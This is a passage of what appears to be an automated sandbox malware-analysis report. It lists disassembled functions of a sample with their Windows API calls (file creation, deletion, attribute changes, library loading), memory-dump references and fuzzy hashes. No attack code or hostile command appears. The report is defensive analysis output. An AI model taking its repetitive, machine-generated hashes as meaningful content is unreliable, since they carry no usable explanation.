                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$BuffersFlushTime
                                                                  • String ID:
                                                                  • API String ID: 1392018926-0
                                                                  • Opcode ID: 5aa29e763940ebb6e5b89b153a402bc0971f3f7f3e849c8e975ef133765da8ef
                                                                  • Instruction ID: cd4cd8d1426b9be5ca2563111c8fc4ea950af1690d8631406321a70ce779db7f
                                                                  • Opcode Fuzzy Hash: 5aa29e763940ebb6e5b89b153a402bc0971f3f7f3e849c8e975ef133765da8ef
                                                                  • Instruction Fuzzy Hash: 6621F231248245EBC714CF35C492AABBBE8AF51305F08481EF8C587692D32DED0C9B66
                                                                  Function 0045966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00459F27,?,?,0045771A), ref: 004596E6
                                                                  • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00459F27,?,?,0045771A), ref: 00459716
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 75caaf87188feefd96b3cdb7222abf340f209387738f8564e81deb6d0387a0bb
                                                                  • Instruction ID: 206af88d360433a6e6a9e46a54c049aa887e96ed10d02f8b91fa7c23b0d1d1ce
                                                                  • Opcode Fuzzy Hash: 75caaf87188feefd96b3cdb7222abf340f209387738f8564e81deb6d0387a0bb
                                                                  • Instruction Fuzzy Hash: 6621C171500344AFE3308A65CC89BA777DCEB49326F000A1EFD95C66D2C77CAC889675
                                                                  Function 00459E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00459EC7
                                                                  • GetLastError.KERNEL32 ref: 00459ED4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: 269f8b14934216684cca7f83c860da04209afccdf26960d2a7fc7e76c7eae9f0
                                                                  • Instruction ID: df76a46dc12cdd319187d8648dd2d9c28441b05d9c6c0f732ed04264d8946a1a
                                                                  • Opcode Fuzzy Hash: 269f8b14934216684cca7f83c860da04209afccdf26960d2a7fc7e76c7eae9f0
                                                                  • Instruction Fuzzy Hash: 59112931600301EBD724CA24C846BABB7E9AB05322F504A2FE953D26D1D378ED4DC768
                                                                  Function 00478E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00478E75
                                                                    • Part of subcall function 00478E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00491098,004517CE,?,?,00000007,?,?,?,004513D6,?,00000000), ref: 00478EB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocAllocate_free
                                                                  • String ID:
                                                                  • API String ID: 2447670028-0
                                                                  • Opcode ID: e9e3af6eb1ca5ae0e4173a2e33a808f6925ae3af1cc848a23fec85c683206146
                                                                  • Instruction ID: 54ef4145c54135cc47bd04ebda168d7b71542ff27a1551649724b48cc297c070
                                                                  • Opcode Fuzzy Hash: e9e3af6eb1ca5ae0e4173a2e33a808f6925ae3af1cc848a23fec85c683206146
                                                                  • Instruction Fuzzy Hash: FAF0C2322811056ADB312A269C0CBEF37588F91B70B24C52FF81CEA291DF6C8D0181AE
                                                                  Function 0046109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 004610AB
                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 004610B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Process$AffinityCurrentMask
                                                                  • String ID:
                                                                  • API String ID: 1231390398-0
                                                                  • Opcode ID: e5e6fbf2af8df1ff3b8d0a50f990536bffd7d2c4f650afc3c482875cbdee4f18
                                                                  • Instruction ID: 33cf73e16c22b32c4931164635cf6429de5cba7b0cce8c91e913a6ed7a274a23
                                                                  • Opcode Fuzzy Hash: e5e6fbf2af8df1ff3b8d0a50f990536bffd7d2c4f650afc3c482875cbdee4f18
                                                                  • Instruction Fuzzy Hash: 8BE0D872F01185A7CF098BB49C058EF73DDEA45205728417BE403D3611F938DE414765
                                                                  Function 0045A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A501
                                                                    • Part of subcall function 0045BB03: _wcslen.LIBCMT ref: 0045BB27
                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0045A325,?,?,?,0045A175,?,00000001,00000000,?,?), ref: 0045A532
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2673547680-0
                                                                  • Opcode ID: 1f8e550eaeaab8deda391f71dda3796c51d8249498abd2f688765b63c92bdd52
                                                                  • Instruction ID: 1d7859a81cef0073fcf37006fe95d688edbe26d4b3d3b44fcdd807dba0b58e12
                                                                  • Opcode Fuzzy Hash: 1f8e550eaeaab8deda391f71dda3796c51d8249498abd2f688765b63c92bdd52
                                                                  • Instruction Fuzzy Hash: 7BF0A03120010D7BDF015F61DC01FDE376CAB0578AF448466BC44E5161EB75DAA8EB64
                                                                  Function 0045A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(000000FF,?,?,0045977F,?,?,004595CF,?,?,?,?,?,00482641,000000FF), ref: 0045A1F1
                                                                    • Part of subcall function 0045BB03: _wcslen.LIBCMT ref: 0045BB27
                                                                  • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0045977F,?,?,004595CF,?,?,?,?,?,00482641), ref: 0045A21F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2643169976-0
                                                                  • Opcode ID: 5e92d579bb57dbcfff7790a4252d5761721967e6cd322159229fde19f72f1ce6
                                                                  • Instruction ID: 95cec51447ddc535e60a46f5213d90c2a455c815a62ab2b11015f3d937e68362
                                                                  • Opcode Fuzzy Hash: 5e92d579bb57dbcfff7790a4252d5761721967e6cd322159229fde19f72f1ce6
                                                                  • Instruction Fuzzy Hash: 3EE022311002086BDB019F21EC02FDE339CAF0878BF080466BC04D2151EB65DE98EB58
                                                                  Function 0046AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00482641,000000FF), ref: 0046ACB0
                                                                  • CoUninitialize.COMBASE(?,?,?,?,00482641,000000FF), ref: 0046ACB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: GdiplusShutdownUninitialize
                                                                  • String ID:
                                                                  • API String ID: 3856339756-0
                                                                  • Opcode ID: ecef0bc48f786d440bd934f214ada50380ae90c0e02997a91a6aa616861f1e76
                                                                  • Instruction ID: 63130188f7cc5616d70c0e4fcba5bb5f8adc372dd7b5fb3d60eceac64b7d8e25
                                                                  • Opcode Fuzzy Hash: ecef0bc48f786d440bd934f214ada50380ae90c0e02997a91a6aa616861f1e76
                                                                  • Instruction Fuzzy Hash: 74E03072504650EBC6019F5DDD06B49FBA8FB48A20F10466AA41693660DB746800CA99
                                                                  Function 0045A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,0045A23A,?,0045755C,?,?,?,?), ref: 0045A254
                                                                    • Part of subcall function 0045BB03: _wcslen.LIBCMT ref: 0045BB27
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0045A23A,?,0045755C,?,?,?,?), ref: 0045A280
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2673547680-0
                                                                  • Opcode ID: a0a192080d3180425c193d8ad70606e947de755d242dc0644aaa52057fe9a178
                                                                  • Instruction ID: 5db08c2788fcbf73dfb71ea928c6909833cc297b6d08db3f69908506b2eae076
                                                                  • Opcode Fuzzy Hash: a0a192080d3180425c193d8ad70606e947de755d242dc0644aaa52057fe9a178
                                                                  • Instruction Fuzzy Hash: 20E0ED314001285ACB10AB24CC05BD97B98AB093E6F0002A2BD44E3295D6749E488AAA
                                                                  Function 0046DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _swprintf.LIBCMT ref: 0046DEEC
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • SetDlgItemTextW.USER32(00000065,?), ref: 0046DF03
                                                                    • Part of subcall function 0046B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046B579
                                                                    • Part of subcall function 0046B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B58A
                                                                    • Part of subcall function 0046B568: IsDialogMessageW.USER32(00010424,?), ref: 0046B59E
                                                                    • Part of subcall function 0046B568: TranslateMessage.USER32(?), ref: 0046B5AC
                                                                    • Part of subcall function 0046B568: DispatchMessageW.USER32(?), ref: 0046B5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                  • String ID:
                                                                  • API String ID: 2718869927-0
                                                                  • Opcode ID: 4f8dba06b5b4d14185c1199719db4a5cdfb3f362400a3b96f216a572085586c1
                                                                  • Instruction ID: 9bc3c90d45573185aea595497eb42fa9369c07dd5299458961ea52472cb6c727
                                                                  • Opcode Fuzzy Hash: 4f8dba06b5b4d14185c1199719db4a5cdfb3f362400a3b96f216a572085586c1
                                                                  • Instruction Fuzzy Hash: 68E02B7240024826DF01AB66CC06FDE376C5F057CEF04046BB600DB0B3F93CDA50866A
                                                                  Function 0046081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00460836
                                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0045F2D8,Crypt32.dll,00000000,0045F35C,?,?,0045F33E,?,?,?), ref: 00460858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystem
                                                                  • String ID:
                                                                  • API String ID: 1175261203-0
                                                                  • Opcode ID: 423c1315bbd6aaf73693336d4f2065df27add4fc007b31847a1e42b3b4c5aa7d
                                                                  • Instruction ID: 2f0ff69d1c606d49408c7055e7a6ffd905053d7f7f1fb30d7188f694a1442a0f
                                                                  • Opcode Fuzzy Hash: 423c1315bbd6aaf73693336d4f2065df27add4fc007b31847a1e42b3b4c5aa7d
                                                                  • Instruction Fuzzy Hash: 26E012764001186ADB11AB95DC05FDB77ACEF09796F04046ABA45D2104E678DA848BA4
                                                                  Function 0046A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0046A3DA
                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0046A3E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: BitmapCreateFromGdipStream
                                                                  • String ID:
                                                                  • API String ID: 1918208029-0
                                                                  • Opcode ID: fc81a43ff442d3a89f05891b069ba395cd2865aa4a17a0fb9e57068887f990d6
                                                                  • Instruction ID: f9fe491c62b8f3055b8f708b6a34951a7aaf41f3abf1c02c8b4e3ce6a0a95e6c
                                                                  • Opcode Fuzzy Hash: fc81a43ff442d3a89f05891b069ba395cd2865aa4a17a0fb9e57068887f990d6
                                                                  • Instruction Fuzzy Hash: 78E0ED75500218EFCB10DF56C54169DBBE8EB04764F10C45BA846A3301F378AE44DF96
                                                                  Function 00472B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00472BAA
                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00472BB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                  • String ID:
                                                                  • API String ID: 1660781231-0
                                                                  • Opcode ID: 48c6c8f41d32078d26972bee8cbaae55c9b00618a930f46a26c2d91bba245e59
                                                                  • Instruction ID: ecebc19ff9dca0e3815257477859cceb8bdc9de857fc5d2382cdcfb1321ddf88
                                                                  • Opcode Fuzzy Hash: 48c6c8f41d32078d26972bee8cbaae55c9b00618a930f46a26c2d91bba245e59
                                                                  • Instruction Fuzzy Hash: 6FD0A735154200284C242E722B035C923559D417797B0D69FE02C955C1DADCB240611D
                                                                  Function 004512F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ItemShowWindow
                                                                  • String ID:
                                                                  • API String ID: 3351165006-0
                                                                  • Opcode ID: 6e71c19678b42398ba21ba26bff08c5b0c7e47414131c8c2069d2f81ac01e9c4
                                                                  • Instruction ID: a4787c7eb061601442e1742b5b2d8ee43c62b85894b518ee02631fb15a952354
                                                                  • Opcode Fuzzy Hash: 6e71c19678b42398ba21ba26bff08c5b0c7e47414131c8c2069d2f81ac01e9c4
                                                                  • Instruction Fuzzy Hash: BDC0123205C200BFCB010FB9DC09C2BBBACABA5312F04CA28F0A5C0060C238C910DB11
                                                                  Function 00451A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 01b7831da6a96c58971e05ec74f1c675798c19a243bcb4ec39b78c81f5d16f57
                                                                  • Instruction ID: baa85065139e8322e90a13ce349d9aca2b0f9a9bfb23821db0793b632c40fb32
                                                                  • Opcode Fuzzy Hash: 01b7831da6a96c58971e05ec74f1c675798c19a243bcb4ec39b78c81f5d16f57
                                                                  • Instruction Fuzzy Hash: 2AC1A230A002549BEF15CF68C484BAE7BA5AF05311F0805BFEC459B3A3DB39A94CCB65
                                                                  Function 00453BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
